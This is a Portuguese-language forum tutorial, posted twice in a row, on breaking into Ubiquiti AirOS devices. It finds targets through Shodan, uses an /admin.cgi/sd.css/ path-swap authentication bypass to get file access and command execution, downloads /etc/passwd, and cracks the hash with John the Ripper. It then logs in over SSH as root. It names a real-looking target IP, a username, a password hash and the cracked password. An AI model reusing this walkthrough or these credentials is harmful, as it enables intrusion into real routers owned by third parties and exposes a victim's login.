Nesse tutorial vou tentar mostrar como é fácil explorar uma vulnerabilidade no AirOS que nos permite ter acesso root ao servidor.
Vamos lá.
O primeiro passo é achar nosso alvo.
Para isso podemos procurar por /login.cgi?uri=/ no google ou no bing.
Mas vamos usar o SHODAN.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Basta pesquisar por airos.
Nesse exemplo vou usar o servidor Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Ao digitarmos isso no browser caímos na página de login Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... e aqui está nossa vulnerabilidade.
Basta substituirmos /login.cgi?uri=/ por /admin.cgi/sd.css/ e vuala!
Podemos ver, fazer upload e download de arquivos e executar comandos!
A partir dai vai da cabeça de vcs. As possibilidades são muitas.
Mas para continuarmos vamos fazer o download do arquivo /etc/passwd.
npyoung:Yy.XD7JYyMfXQ:0:0:Administrator:/etc/persistent:/bin/sh
Agora é so usar o bom e velho John e temos:
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
idola (npyoung)
guesses: 1 time: 0:00:00:46 (3) c/s: 2713k trying ide52 - idold
Voltamos a pagina de login e estamos dentro
Agora é só dar um nmap 207.55.233.246 e perceber:
PORT STATE SERVICE
22/tcp open ssh
Vamos ao putty e conectamos no servidor:
login as: npyoung
npyoung@207.55.233.246's password:
BusyBox v1.11.2 (2011-04-29 17:41:29 EEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
XM.v5.3.2# id
uid=0(npyoung) gid=0(admin)
O edu0ox postou uma video aula no forum. Para melhor entendimento
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vlw. Espero que gostem
Vamos lá.
O primeiro passo é achar nosso alvo.
Para isso podemos procurar por /login.cgi?uri=/ no google ou no bing.
Mas vamos usar o SHODAN.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Basta pesquisar por airos.
Nesse exemplo vou usar o servidor Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Ao digitarmos isso no browser caímos na página de login Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... e aqui está nossa vulnerabilidade.
Basta substituirmos /login.cgi?uri=/ por /admin.cgi/sd.css/ e vuala!
Podemos ver, fazer upload e download de arquivos e executar comandos!
A partir dai vai da cabeça de vcs. As possibilidades são muitas.
Mas para continuarmos vamos fazer o download do arquivo /etc/passwd.
npyoung:Yy.XD7JYyMfXQ:0:0:Administrator:/etc/persistent:/bin/sh
Agora é so usar o bom e velho John e temos:
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
idola (npyoung)
guesses: 1 time: 0:00:00:46 (3) c/s: 2713k trying ide52 - idold
Voltamos a pagina de login e estamos dentro
Agora é só dar um nmap 207.55.233.246 e perceber:
PORT STATE SERVICE
22/tcp open ssh
Vamos ao putty e conectamos no servidor:
login as: npyoung
npyoung@207.55.233.246's password:
BusyBox v1.11.2 (2011-04-29 17:41:29 EEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
XM.v5.3.2# id
uid=0(npyoung) gid=0(admin)
O edu0ox postou uma video aula no forum. Para melhor entendimento
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vlw. Espero que gostem
Comment